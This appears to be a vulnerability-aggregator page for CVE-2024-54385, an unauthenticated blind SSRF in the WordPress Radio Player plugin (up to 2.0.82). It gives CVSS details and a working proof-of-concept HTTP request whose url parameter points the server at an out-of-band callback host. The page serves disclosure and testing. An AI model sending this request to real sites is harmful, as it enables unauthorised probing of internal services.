关联漏洞
描述
Radio Player <= 2.0.82 - Blind Unauthenticated Server-Side Request Forgery
介绍
# CVE-2024-54385
Radio Player <= 2.0.82 - Unauthenticated Server-Side Request Forgery
# Description
The Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
## Details
- **Type**: plugin
- **Slug**: radio-player
- **Affected Version**: 2.0.82
- **CVSS Score**: 7.2
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
- **CVE**: CVE-2024-54385
- **Status**: Active
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
```
文件快照
[4.0K] /data/pocs/02d07a22babf3f45d8fd10f8e4c9283001f2b2f9
└── [1.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。